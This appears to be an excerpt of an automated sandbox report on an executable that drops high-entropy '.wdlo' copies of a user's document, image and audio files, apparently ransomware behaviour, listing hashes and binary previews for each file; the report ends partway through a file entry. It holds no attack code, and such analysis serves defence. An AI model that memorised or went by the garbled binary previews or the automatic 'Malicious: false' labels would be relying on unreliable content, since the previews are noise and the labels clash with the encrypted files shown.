SHA-256:	9F7F11F752E4F90A25F59DD4ED084A2D01EEBE3D1D7B39CC6D80E292C3AE5A28
SHA-512:	1B2276B140B0897140132DD9963E698F30B73CFB10E3561F9E1143D7777964430AA7B2B8E3158D18A0EF2895F941627325C142B4501080DD33E9DE79983DE9FE
Malicious:	false
Reputation:	unknown
Preview:	SFPUS.3..&.....5...v........D....@?.......z...,......1...2I.....iSED.<...r8.C..{.....{.....Q..!".dQ..~t..._..6.d.l.\...qI.,...k..../._z.g...,......zK7.I.BO...O..$..O}.c....ll.W....S...PS.D......g./s...].9......$...(#.p....pQ.....k.{......Le((............1...3.p....a#.<d.2...x....\.t.v.]5/.Kn#..X.X,...........E}K.j>.c.\|G...".}..i.C.5..J3.c7y'S....~..\|.;.......`J.....T!.5=....^..0..I..<...x..rX....Re.1....N.G.O.F.xf=...D3...Hs..UX...@$-.....<.....X.MEx.....r.q...._..\|f]W@%x.....^.Zmz75~.\|st\....n....`....x.e.......r/85.+.s.......5Zus. IN.A}q..yk...h'.+.].._..3if4......hz.Z...}..(..T.;.M.D6......}.2.D..J.F.(...n..1..3v.;M....,P..6..r.8.?.Da...x^...H..~<IC.......L..g...=.h.......^..9..{Bf.,.^A.BU.....tos.c&..^w[.Q..... ...r...z7r.._..V..H...bf}[...P.......e@.;...:O....r.OY.....p}.E/}[.T...z.ud/.^d.71....n...&.&.{y.V&....w..J..'Su....U..7...=...w}..g.....bSL.....#..5......,.6}..K\|]c3.........<_'......i..z.:ZG@l....o.....q..7...1mh.J..:....;

C:\Users\user\Documents\FENIVHOIKN\SFPUSAFIOL.png.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851094055265453
Encrypted:	false
SSDEEP:	24:5P8pdTGRJwOtj5aVuqj5mylRKMTQ8JF4wiL3Bp/qKPAGjPWrpI5QUqh1BLpWFbD:18p8RJJNaVuqjM0KMTQ8JniVp/qKvPW6
MD5:	50EE1C65164060A1DD7E45F11E2FBE89
SHA1:	DACDED0F797B00E6B96D5AA45462C54B60DE741A
SHA-256:	9F7F11F752E4F90A25F59DD4ED084A2D01EEBE3D1D7B39CC6D80E292C3AE5A28
SHA-512:	1B2276B140B0897140132DD9963E698F30B73CFB10E3561F9E1143D7777964430AA7B2B8E3158D18A0EF2895F941627325C142B4501080DD33E9DE79983DE9FE
Malicious:	false
Reputation:	unknown
Preview:	SFPUS.3..&.....5...v........D....@?.......z...,......1...2I.....iSED.<...r8.C..{.....{.....Q..!".dQ..~t..._..6.d.l.\...qI.,...k..../._z.g...,......zK7.I.BO...O..$..O}.c....ll.W....S...PS.D......g./s...].9......$...(#.p....pQ.....k.{......Le((............1...3.p....a#.<d.2...x....\.t.v.]5/.Kn#..X.X,...........E}K.j>.c.\|G...".}..i.C.5..J3.c7y'S....~..\|.;.......`J.....T!.5=....^..0..I..<...x..rX....Re.1....N.G.O.F.xf=...D3...Hs..UX...@$-.....<.....X.MEx.....r.q...._..\|f]W@%x.....^.Zmz75~.\|st\....n....`....x.e.......r/85.+.s.......5Zus. IN.A}q..yk...h'.+.].._..3if4......hz.Z...}..(..T.;.M.D6......}.2.D..J.F.(...n..1..3v.;M....,P..6..r.8.?.Da...x^...H..~<IC.......L..g...=.h.......^..9..{Bf.,.^A.BU.....tos.c&..^w[.Q..... ...r...z7r.._..V..H...bf}[...P.......e@.;...:O....r.OY.....p}.E/}[.T...z.ud/.^d.71....n...&.&.{y.V&....w..J..'Su....U..7...=...w}..g.....bSL.....#..5......,.6}..K\|]c3.........<_'......i..z.:ZG@l....o.....q..7...1mh.J..:....;

C:\Users\user\Documents\FENIVHOIKN\UOOJJOZIRH.jpg

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.841723978171928
Encrypted:	false
SSDEEP:	24:2bLmeU22IRO19eLpQk5l623WZDWLQDWQ4d76w0v7zJvZWFbD:2bLO22N2zP0zWDYzFZWVD
MD5:	6339735D1A14592F1CE2D2B646B0004C
SHA1:	13DA36596FC9751FDD349E99271C8FFE616FEBA3
SHA-256:	44DCCFCAD812C6F94B82F8BEA87CDCBF0B9608DDE5FF80C7069392F33EFA8AA2
SHA-512:	13336611664C16D18433982C195999CFECA08C0532585A182F222B50904052C6C9D21C7C7442AF68622BD9FAD355E8040B95BC0CE35F9DBA89F157AC34AECE4A
Malicious:	false
Reputation:	unknown
Preview:	UOOJJ.;...K..Z....Je{..@7H]..l..^....)9S./.....\|.O....^....x..i..... .%Q..(".$.G....cV....-.[....0......'..2 %....o.....:-).bZ............`..g.6.S.[.=.n.hPU8d..U../../...d...7...O%.i..@w!....#....-.L....L.)6J.Y...&u>.,.2FOO.F.,...au.d..0h4..[...c........\..[,'./...D%l...K..........{.%...y.g.......<.G.0.......n.`.`....U.D>7.....Q.....{k....'U..lK.T=.b.AJ8.mg"...."....N.......t(.w..lw.....Q...w....w....u ..eH.........q.....!iB.l...FZ..:$....+....:..g....A.Fz..........^.j.u..G..P...$..e..F.."e..F).B.83M..]-"..ka.@'#...a\..[F.>.............05..C$4(G,.....qK=y.A....5......".b..kt.R........V...i....e......b...L!..S'......./.xzj.K..@..-..K........ZQ........}'t.......Tx.r...^u.X.T..\\aFV.W.v..{.......L{.C5379....R2..B..+zM.N",..{m...B._....Jk.y......b..h...........V5l:.....ny..>\|M..(.}.l.\mK.EO.f.R.yb........z....bY.)..b$..p.R9W.7w.~$.......Z%.\.<..5....>..+.......{........&u8y.:.&A.O..Y_.....g..6.5.U.<..5..h.~...T.$..T...v.d.W...i....e..T.Z....^.*.

C:\Users\user\Documents\FENIVHOIKN\UOOJJOZIRH.jpg.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.841723978171928
Encrypted:	false
SSDEEP:	24:2bLmeU22IRO19eLpQk5l623WZDWLQDWQ4d76w0v7zJvZWFbD:2bLO22N2zP0zWDYzFZWVD
MD5:	6339735D1A14592F1CE2D2B646B0004C
SHA1:	13DA36596FC9751FDD349E99271C8FFE616FEBA3
SHA-256:	44DCCFCAD812C6F94B82F8BEA87CDCBF0B9608DDE5FF80C7069392F33EFA8AA2
SHA-512:	13336611664C16D18433982C195999CFECA08C0532585A182F222B50904052C6C9D21C7C7442AF68622BD9FAD355E8040B95BC0CE35F9DBA89F157AC34AECE4A
Malicious:	false
Reputation:	unknown
Preview:	UOOJJ.;...K..Z....Je{..@7H]..l..^....)9S./.....\|.O....^....x..i..... .%Q..(".$.G....cV....-.[....0......'..2 %....o.....:-).bZ............`..g.6.S.[.=.n.hPU8d..U../../...d...7...O%.i..@w!....#....-.L....L.)6J.Y...&u>.,.2FOO.F.,...au.d..0h4..[...c........\..[,'./...D%l...K..........{.%...y.g.......<.G.0.......n.`.`....U.D>7.....Q.....{k....'U..lK.T=.b.AJ8.mg"...."....N.......t(.w..lw.....Q...w....w....u ..eH.........q.....!iB.l...FZ..:$....+....:..g....A.Fz..........^.j.u..G..P...$..e..F.."e..F).B.83M..]-"..ka.@'#...a\..[F.>.............05..C$4(G,.....qK=y.A....5......".b..kt.R........V...i....e......b...L!..S'......./.xzj.K..@..-..K........ZQ........}'t.......Tx.r...^u.X.T..\\aFV.W.v..{.......L{.C5379....R2..B..+zM.N",..{m...B._....Jk.y......b..h...........V5l:.....ny..>\|M..(.}.l.\mK.EO.f.R.yb........z....bY.)..b$..p.R9W.7w.~$.......Z%.\.<..5....>..+.......{........&u8y.:.&A.O..Y_.....g..6.5.U.<..5..h.~...T.$..T...v.d.W...i....e..T.Z....^.*.

C:\Users\user\Documents\FENIVHOIKN\VAMYDFPUND.pdf

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865912948241153
Encrypted:	false
SSDEEP:	24:U+PfLhUfgJjm4wIkNb5isR7l4Z+ccRWNQU7vQyw8+4gqoAfxJeiAoDfkWFbD:U+nLhR0IiAsR7akwf7Q78uqoAOIMWVD
MD5:	854458092E77B11CE6ED63DEED7CB5D0
SHA1:	6EE36F0225D3CA2DEA4D5B61440323C61B50281F
SHA-256:	483EA6465DC4AC153AD7EE0A88AB4B8D9DB1DC017F1AED63CFFFA18A7B41E7CA
SHA-512:	6C35DF2E2C6ACF6621DD96ED53233ACF04F1C6BCD20E2D60EC59D891B27494D183865CBC5C1931CE255EEED1E576DBE039205721B97737C3DB6E50862313053D
Malicious:	false
Reputation:	unknown
Preview:	VAMYDK:.#....P(........O...4.u@.H."m.....ZV...9e..o..=......b.~." ..G.{2D....^v.aX.K...\|...z[.z9..........K.....8...g...C.!F..s..b3&7.7....lo.A....n..,....S4....O.f.....XD3...v........b.F....R?..,.........=..-.gdy(..W.y.....!.!.{.a..!.n.2......qy..z.....c..3..G....u...A.k.`-.....)MC.2....."....f..y,..9.G.8.;.w......@.yC..7...Q.HZ...iH?.,......m...T.s4..c....}...3w>:..@.......j7k3r.,...n..)t.P.Ln)^X..bJ..m.a.d..K...-.<=8..A..f.v..&....=...;..P. .V]eg..w...!.X)zZ..wzk....k.F.....T...L0.zx#,.9.....r..KOb^z..............:...NS......r..a..I.u6..........@.U...3m...L1.......6.+.>e..^4.L.O........ku..><[m.(.tx.-..Zu.....ks..!..g.Q..l.Uu..J...i.x2u.i))W..Z%.K..AZ.1..;"v{.p...V...5.oM.....[Sm..H..}<P'..g$b..l^3`.a.G.O.]....X".eo#..p...K..)...^M......zx..Y...ku........j...c.T$....K.?.M._4j.3.X/...~1. .=.... .)&.O.:CB4.".X)..y}.7.... p.2.;..,"e....u?._.@...i.5.#.6....('..u.@../.....Pd.l.^/.N......>.s..w...U.y2v.........iE..i.W...ak$.C..N...3.k.o.

C:\Users\user\Documents\FENIVHOIKN\VAMYDFPUND.pdf.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865912948241153
Encrypted:	false
SSDEEP:	24:U+PfLhUfgJjm4wIkNb5isR7l4Z+ccRWNQU7vQyw8+4gqoAfxJeiAoDfkWFbD:U+nLhR0IiAsR7akwf7Q78uqoAOIMWVD
MD5:	854458092E77B11CE6ED63DEED7CB5D0
SHA1:	6EE36F0225D3CA2DEA4D5B61440323C61B50281F
SHA-256:	483EA6465DC4AC153AD7EE0A88AB4B8D9DB1DC017F1AED63CFFFA18A7B41E7CA
SHA-512:	6C35DF2E2C6ACF6621DD96ED53233ACF04F1C6BCD20E2D60EC59D891B27494D183865CBC5C1931CE255EEED1E576DBE039205721B97737C3DB6E50862313053D
Malicious:	false
Reputation:	unknown
Preview:	VAMYDK:.#....P(........O...4.u@.H."m.....ZV...9e..o..=......b.~." ..G.{2D....^v.aX.K...\|...z[.z9..........K.....8...g...C.!F..s..b3&7.7....lo.A....n..,....S4....O.f.....XD3...v........b.F....R?..,.........=..-.gdy(..W.y.....!.!.{.a..!.n.2......qy..z.....c..3..G....u...A.k.`-.....)MC.2....."....f..y,..9.G.8.;.w......@.yC..7...Q.HZ...iH?.,......m...T.s4..c....}...3w>:..@.......j7k3r.,...n..)t.P.Ln)^X..bJ..m.a.d..K...-.<=8..A..f.v..&....=...;..P. .V]eg..w...!.X)zZ..wzk....k.F.....T...L0.zx#,.9.....r..KOb^z..............:...NS......r..a..I.u6..........@.U...3m...L1.......6.+.>e..^4.L.O........ku..><[m.(.tx.-..Zu.....ks..!..g.Q..l.Uu..J...i.x2u.i))W..Z%.K..AZ.1..;"v{.p...V...5.oM.....[Sm..H..}<P'..g$b..l^3`.a.G.O.]....X".eo#..p...K..)...^M......zx..Y...ku........j...c.T$....K.?.M._4j.3.X/...~1. .=.... .)&.O.:CB4.".X)..y}.7.... p.2.;..,"e....u?._.@...i.5.#.6....('..u.@../.....Pd.l.^/.N......>.s..w...U.y2v.........iE..i.W...ak$.C..N...3.k.o.

C:\Users\user\Documents\FENIVHOIKN\WKXEWIOTXI.xlsx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.871937345670421
Encrypted:	false
SSDEEP:	24:Jz1buIxEcKD86Y57AVhvceOCTKLdRZ4cUyFxWLM9SQK+mOOOtcu6WHCR4VT5CkWt:JztTacSA5UkvHL3icUOeMvO8c7M5CkWt
MD5:	5680547734BBDBDE564D8AC8BD5B0EE5
SHA1:	1FD30DEE9C74737BAF377BE57A5101C398C7CD44
SHA-256:	2E8A3DE0498DC08BA43C249791E788CBE47B2F198E4C726C9C7DCFB316810C78
SHA-512:	E92423057C6EA384439283EE60C5F91A5543A8405776F265ABFF2F35845F7D6FDCCC8F6C217FDA34F04DDC57B2E2645D79C5E3E5CA2155DB9F6C8ADE3399CB04
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.Q......#..vS).......d{(..<...8...f.....m.nI..K>....N.4....$9.AU..4........3...f .......<.I...A.k......08%_`...H7839P..sUe:......H.Z...+.e...:.i..3A..S,...+%.C}...6......h!..N.l.1.o.k-.\|..AR.t..r.-.y.@\|..+..2G.F[....6...KA../...Gtdlx..mV..#H\g..'w...3w....#..i.;.e...{g.5.&.F.t..0dM...%.aR.r...I....f.o...g.r~}(..M.$..5.}..........~.......X/(\...A.......+S+.x.%AR;p.hZ..0.hd.w.('.D..h.\|x.&.4l...7R.....V(..p..o....{.R.u.......3.1wMD.j!../..3i..vK...H..~.}.t..K...T....O......v=.A..#..X....j...7\.6...'I..Y(....>[. =.........._@.5...z.._..../m.g$.{......,'}RYm...C..S:..i.........\..K..-...W.q...o..........R..`;....Lj.....p4.$.\...]...f~...k_}.Iv..D.H.oW[q"x7.....\..M/.......=..?..e.....>..q.N...?brG...p..~.6._.&2.D+.\|.........q..ZG...(..?..g.).y.Q....b...... ..............DF..%......@.5Xq.....m.7.e.cb.J..T{......t.,.u.U.......-...CM..gP)....kyn..!...y%.'?,@3.!.........]+.l.\.r6y...J...5..a=X..H....&....-...R<...#..`..zgI.d,.L.<.)r...>

C:\Users\user\Documents\FENIVHOIKN\WKXEWIOTXI.xlsx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.871937345670421
Encrypted:	false
SSDEEP:	24:Jz1buIxEcKD86Y57AVhvceOCTKLdRZ4cUyFxWLM9SQK+mOOOtcu6WHCR4VT5CkWt:JztTacSA5UkvHL3icUOeMvO8c7M5CkWt
MD5:	5680547734BBDBDE564D8AC8BD5B0EE5
SHA1:	1FD30DEE9C74737BAF377BE57A5101C398C7CD44
SHA-256:	2E8A3DE0498DC08BA43C249791E788CBE47B2F198E4C726C9C7DCFB316810C78
SHA-512:	E92423057C6EA384439283EE60C5F91A5543A8405776F265ABFF2F35845F7D6FDCCC8F6C217FDA34F04DDC57B2E2645D79C5E3E5CA2155DB9F6C8ADE3399CB04
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.Q......#..vS).......d{(..<...8...f.....m.nI..K>....N.4....$9.AU..4........3...f .......<.I...A.k......08%_`...H7839P..sUe:......H.Z...+.e...:.i..3A..S,...+%.C}...6......h!..N.l.1.o.k-.\|..AR.t..r.-.y.@\|..+..2G.F[....6...KA../...Gtdlx..mV..#H\g..'w...3w....#..i.;.e...{g.5.&.F.t..0dM...%.aR.r...I....f.o...g.r~}(..M.$..5.}..........~.......X/(\...A.......+S+.x.%AR;p.hZ..0.hd.w.('.D..h.\|x.&.4l...7R.....V(..p..o....{.R.u.......3.1wMD.j!../..3i..vK...H..~.}.t..K...T....O......v=.A..#..X....j...7\.6...'I..Y(....>[. =.........._@.5...z.._..../m.g$.{......,'}RYm...C..S:..i.........\..K..-...W.q...o..........R..`;....Lj.....p4.$.\...]...f~...k_}.Iv..D.H.oW[q"x7.....\..M/.......=..?..e.....>..q.N...?brG...p..~.6._.&2.D+.\|.........q..ZG...(..?..g.).y.Q....b...... ..............DF..%......@.5Xq.....m.7.e.cb.J..T{......t.,.u.U.......-...CM..gP)....kyn..!...y%.'?,@3.!.........]+.l.\.r6y...J...5..a=X..H....&....-...R<...#..`..zgI.d,.L.<.)r...>

C:\Users\user\Documents\NEBFQQYWPS.mp3

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851636714745768
Encrypted:	false
SSDEEP:	24:9PFbYLi6pHawA8Y6rGCd2FlsHaVLEOgOEu29yuqp4abD4hvPzh47F478uWFbD:rNyH7AIS3s0LEqEuOrg4o4h3zhoF4fWt
MD5:	0C2A8E25986A370A03A1DA43CD2DEFE1
SHA1:	59B1ADEFEEAFD2DA218C8DB48154D75B4FCF5AE8
SHA-256:	4521AAFF3ABF737980FB9208B7A3C8BB58455BBB4366E93249507750BA3D9FB0
SHA-512:	1989E0DAF424E1B66F3D23FFFE0A6B00B775F4C91B12AA33814B71D8DC1FBD6215D303A5E4216DAAB99DC28E6C89276C975B780D2AA1CC172F463C381C19F63A
Malicious:	false
Reputation:	unknown
Preview:	NEBFQ..:.....{5I8ee..6n.....b.Q..`m..O.X3P.D.q..i..%..r..`....~{.."Up...5......G.og..h..:....N.S}..U.7....2.v.z.]G.,..:..=.W..<..a.;.7..m.B+.a.u/.7N...z.>..c.?..j...(..G6I..9.$...#...S..%..C6.._.-.A+jw.....\|eoI-..$R]..B.+..y.G.3.."..bh.~.+...e.z.U@.T.YR..~B.m.........#...&v...\..h...+.....a~c.?.~......q....m]. ).'...LZ..4.~...>9.m..J.d.IC..fM.&...).WG...>C....I..q.S.......8.^?..g.}aQ....@.L..iS......j~..n.t. .@..n9D..U.".>...q..P.;.'D&..T..X]1Z'/.k....b.SSh..z....n.R..n...0KM!..A....+,...t.......w...#....-l.......aW>.y../...&.....~.No...Z..k.......o...t.%.a...]rI.<.!"j...O...X..../.u...,..f..Z...1o.U..DW-./&..#....K~...."..x.......l...E.#9...P.s..0........7.....,g_...7z.....?..M.k....9.M..B].I.j..._9}...lR:...W...D..p.of....Fk...~Hvg.d.......9@...0..(Y^...Sm.k......QRP4.a..0G...P#....../.....@.m.....7M~...L...J..tt%O...U.9..P.G<.Z.q.`n.Q..8.O..-Q~.z..._=...C.&...}...9]db.d.U..$R..[c.....c...>.c.......).&..{R2 .....-...0..ud...o

C:\Users\user\Documents\NEBFQQYWPS.mp3.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851636714745768
Encrypted:	false
SSDEEP:	24:9PFbYLi6pHawA8Y6rGCd2FlsHaVLEOgOEu29yuqp4abD4hvPzh47F478uWFbD:rNyH7AIS3s0LEqEuOrg4o4h3zhoF4fWt
MD5:	0C2A8E25986A370A03A1DA43CD2DEFE1
SHA1:	59B1ADEFEEAFD2DA218C8DB48154D75B4FCF5AE8
SHA-256:	4521AAFF3ABF737980FB9208B7A3C8BB58455BBB4366E93249507750BA3D9FB0
SHA-512:	1989E0DAF424E1B66F3D23FFFE0A6B00B775F4C91B12AA33814B71D8DC1FBD6215D303A5E4216DAAB99DC28E6C89276C975B780D2AA1CC172F463C381C19F63A
Malicious:	false
Reputation:	unknown
Preview:	NEBFQ..:.....{5I8ee..6n.....b.Q..`m..O.X3P.D.q..i..%..r..`....~{.."Up...5......G.og..h..:....N.S}..U.7....2.v.z.]G.,..:..=.W..<..a.;.7..m.B+.a.u/.7N...z.>..c.?..j...(..G6I..9.$...#...S..%..C6.._.-.A+jw.....\|eoI-..$R]..B.+..y.G.3.."..bh.~.+...e.z.U@.T.YR..~B.m.........#...&v...\..h...+.....a~c.?.~......q....m]. ).'...LZ..4.~...>9.m..J.d.IC..fM.&...).WG...>C....I..q.S.......8.^?..g.}aQ....@.L..iS......j~..n.t. .@..n9D..U.".>...q..P.;.'D&..T..X]1Z'/.k....b.SSh..z....n.R..n...0KM!..A....+,...t.......w...#....-l.......aW>.y../...&.....~.No...Z..k.......o...t.%.a...]rI.<.!"j...O...X..../.u...,..f..Z...1o.U..DW-./&..#....K~...."..x.......l...E.#9...P.s..0........7.....,g_...7z.....?..M.k....9.M..B].I.j..._9}...lR:...W...D..p.of....Fk...~Hvg.d.......9@...0..(Y^...Sm.k......QRP4.a..0G...P#....../.....@.m.....7M~...L...J..tt%O...U.9..P.G<.Z.q.`n.Q..8.O..-Q~.z..._=...C.&...}...9]db.d.U..$R..[c.....c...>.c.......).&..{R2 .....-...0..ud...o

C:\Users\user\Documents\RAYHIWGKDI.docx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85804301678294
Encrypted:	false
SSDEEP:	24:Zne6k7yiP6mg2TahlaJzBDB9pitcOtqQPoSiWR9pt2HTJCJOS4P0vKkWFbD:06k7yV2GEHkcOtq/SiwpczEsQWVD
MD5:	21DF44E0FE2B4EFC7F9DA795E9857086
SHA1:	C9B693A187E14EC6C2E029312899EBCFA9117288
SHA-256:	1BDD18497F80F143E5F92DA6D2C040EB8A6242EDDA8A51E4DB958FCF128695BA
SHA-512:	06BCA384758DB93A4BD26482A4564403CCF2A92C20F810A6FE16E97456351519D8DF8740A9EA460DCD88ABF0F6E5187099019C357E4AA48EBA26A0BFAD9DB70B
Malicious:	false
Reputation:	unknown
Preview:	RAYHI..q..Ut>..+...L........z..I..Y.h}0.p........A>.[-....>.7..i......=..1]..:;.;.V..;.w......5.u.u..2..............f....]...\>..sE.x...cN'.Q..A...r.....IQ..2.m...,3..u....(s.)...`....`..?.K....Q!..\'.z.3/.....'....o#.;d......b..m g."3.!.o.N....\|b.%..tD.".....1..(....~w.+N.wt.L.B..nz.{...=..i..$....0.?...)..v...o(z..'..oo&%..>...H.}...6..86Y.....6...zs..c.`4.....F....e...Cp..g..Cp.{......v.^.5..S.#.Q.t=....G..v.'.e.dsh'..s.........G.".B....t.&.B.7.6.4....p.'.2.zn.J.P{.... (R.~I.#.l..Rn.....R.z%.^<.]2.3.?..J.X..S..'S=0.5..x......A.S.....\\|..p.D.......q=e.....d&......#`h....,./"....R.:<..6..4...I.Hx"..3.`.......hbf[...$U.1ul....O..I.. .R..U.......%."j...R....q>.........C..E.L....8..u...P,9.IA..S..J u..'........^[]..hux....c).p ...r......s.....gE...G#.)..#......t.?./O.............,9.B+....=W......8w.J....b.......vm...r..YFI..S.....i.]...l..wE.Z....v.......K.YB'wV.c!.PQ...l.V..}..1...........h...Z.....:J...@J.O.......ZR;.3.

C:\Users\user\Documents\RAYHIWGKDI.docx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85804301678294
Encrypted:	false
SSDEEP:	24:Zne6k7yiP6mg2TahlaJzBDB9pitcOtqQPoSiWR9pt2HTJCJOS4P0vKkWFbD:06k7yV2GEHkcOtq/SiwpczEsQWVD
MD5:	21DF44E0FE2B4EFC7F9DA795E9857086
SHA1:	C9B693A187E14EC6C2E029312899EBCFA9117288
SHA-256:	1BDD18497F80F143E5F92DA6D2C040EB8A6242EDDA8A51E4DB958FCF128695BA
SHA-512:	06BCA384758DB93A4BD26482A4564403CCF2A92C20F810A6FE16E97456351519D8DF8740A9EA460DCD88ABF0F6E5187099019C357E4AA48EBA26A0BFAD9DB70B
Malicious:	false
Reputation:	unknown
Preview:	RAYHI..q..Ut>..+...L........z..I..Y.h}0.p........A>.[-....>.7..i......=..1]..:;.;.V..;.w......5.u.u..2..............f....]...\>..sE.x...cN'.Q..A...r.....IQ..2.m...,3..u....(s.)...`....`..?.K....Q!..\'.z.3/.....'....o#.;d......b..m g."3.!.o.N....\|b.%..tD.".....1..(....~w.+N.wt.L.B..nz.{...=..i..$....0.?...)..v...o(z..'..oo&%..>...H.}...6..86Y.....6...zs..c.`4.....F....e...Cp..g..Cp.{......v.^.5..S.#.Q.t=....G..v.'.e.dsh'..s.........G.".B....t.&.B.7.6.4....p.'.2.zn.J.P{.... (R.~I.#.l..Rn.....R.z%.^<.]2.3.?..J.X..S..'S=0.5..x......A.S.....\\|..p.D.......q=e.....d&......#`h....,./"....R.:<..6..4...I.Hx"..3.`.......hbf[...$U.1ul....O..I.. .R..U.......%."j...R....q>.........C..E.L....8..u...P,9.IA..S..J u..'........^[]..hux....c).p ...r......s.....gE...G#.)..#......t.?./O.............,9.B+....=W......8w.J....b.......vm...r..YFI..S.....i.]...l..wE.Z....v.......K.YB'wV.c!.PQ...l.V..}..1...........h...Z.....:J...@J.O.......ZR;.3.

C:\Users\user\Documents\RAYHIWGKDI\CURQNKVOIX.pdf

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.834213687580221
Encrypted:	false
SSDEEP:	24:x7dxSfrAQo2PJXz0EtZS9CHYlg9CxYUFWe0a6HBBu/CZF2AN9+oVSCAcHKJdkWFX:xRxYAQ7Jj0iEg9C1GhTsAN9VdEmWVD
MD5:	1E7475C26BB4B0E550FA5E6B232FEE6B
SHA1:	6363DE11BA059B9F015358655436D9628ED092AE
SHA-256:	9AEAA838DE26FFDE0B6723D14FE21B6F431F51284216D3AF03FBD7CC2DB4BC29
SHA-512:	FB7BA73C222C55E4E1D01FF9128080EF7E31A436B03F55F9AD3EE464F408274AC3828529EC5A5340CE022929AB1852C816EBE209AFBF984416CFA805347B9C90
Malicious:	false
Reputation:	unknown
Preview:	CURQN:.P.ya.....=7.1.B\.xz......6q......r0+...=q...!..-k.G..Y_,.tqfX.B.l...mt....L.p7..u1....gj\..O.... .u......Po....^D.P.S.afq)]P%..V.....[..J..e..y.^...?.oV(....i-'h{..."a{..i....Qcn..W+Rd..?.im72lR.....{...Z.e....N..g.].;Fg>.u......}r.).Y.~..N..Z..AE!...%.....,....6.a....q.X7 ur...P..{.}2-.&.s....=...(lP....0'.+\|..2..d.g..i.R1.hw%.m.RU.........8......?...."M(.+.Z....J.....f..TUF..{CWt.ox.......\S67.M..).>.5do2'..x. .."..."`.....OV...~J....a.q.N..xFZ...X..A.\.....?4..D.wM.=.;.+..!a....H.f.q...C=O.xo.:....2l.3r..6....u.....-..\.....P.......x...#. ].8......8...ll.N.9.b...[.......4...6....p..R..2.oH}.4g.-.P\RQn.L.m.O.7Gg..FE:X..@s#.d(..}...\|..=Y"...KMD.N.[..nM.O}..d9...31.+Q.gWT......,..e.. ...&:QT...m........!..1.b...:f.....W.#.E;.)..W(...xC.mJ.....u.Y..k..<j..~R.....M..~...M..gs.mA.y5^. >..ka..vi.^....R.....0..e.....!i?.R"o-.G....U..RM0.gF..p..l.JL..g;....C.t..,.e&`6Eb......+P....n.2f.p.%:.g4.....a@.f..~p..*.,...6Ot...\..b

C:\Users\user\Documents\RAYHIWGKDI\CURQNKVOIX.pdf.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.834213687580221
Encrypted:	false
SSDEEP:	24:x7dxSfrAQo2PJXz0EtZS9CHYlg9CxYUFWe0a6HBBu/CZF2AN9+oVSCAcHKJdkWFX:xRxYAQ7Jj0iEg9C1GhTsAN9VdEmWVD
MD5:	1E7475C26BB4B0E550FA5E6B232FEE6B
SHA1:	6363DE11BA059B9F015358655436D9628ED092AE
SHA-256:	9AEAA838DE26FFDE0B6723D14FE21B6F431F51284216D3AF03FBD7CC2DB4BC29
SHA-512:	FB7BA73C222C55E4E1D01FF9128080EF7E31A436B03F55F9AD3EE464F408274AC3828529EC5A5340CE022929AB1852C816EBE209AFBF984416CFA805347B9C90
Malicious:	false
Reputation:	unknown
Preview:	CURQN:.P.ya.....=7.1.B\.xz......6q......r0+...=q...!..-k.G..Y_,.tqfX.B.l...mt....L.p7..u1....gj\..O.... .u......Po....^D.P.S.afq)]P%..V.....[..J..e..y.^...?.oV(....i-'h{..."a{..i....Qcn..W+Rd..?.im72lR.....{...Z.e....N..g.].;Fg>.u......}r.).Y.~..N..Z..AE!...%.....,....6.a....q.X7 ur...P..{.}2-.&.s....=...(lP....0'.+\|..2..d.g..i.R1.hw%.m.RU.........8......?...."M(.+.Z....J.....f..TUF..{CWt.ox.......\S67.M..).>.5do2'..x. .."..."`.....OV...~J....a.q.N..xFZ...X..A.\.....?4..D.wM.=.;.+..!a....H.f.q...C=O.xo.:....2l.3r..6....u.....-..\.....P.......x...#. ].8......8...ll.N.9.b...[.......4...6....p..R..2.oH}.4g.-.P\RQn.L.m.O.7Gg..FE:X..@s#.d(..}...\|..=Y"...KMD.N.[..nM.O}..d9...31.+Q.gWT......,..e.. ...&:QT...m........!..1.b...:f.....W.#.E;.)..W(...xC.mJ.....u.Y..k..<j..~R.....M..~...M..gs.mA.y5^. >..ka..vi.^....R.....0..e.....!i?.R"o-.G....U..RM0.gF..p..l.JL..g;....C.t..,.e&`6Eb......+P....n.2f.p.%:.g4.....a@.f..~p..*.,...6Ot...\..b

C:\Users\user\Documents\RAYHIWGKDI\FENIVHOIKN.xlsx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.837456661973183
Encrypted:	false
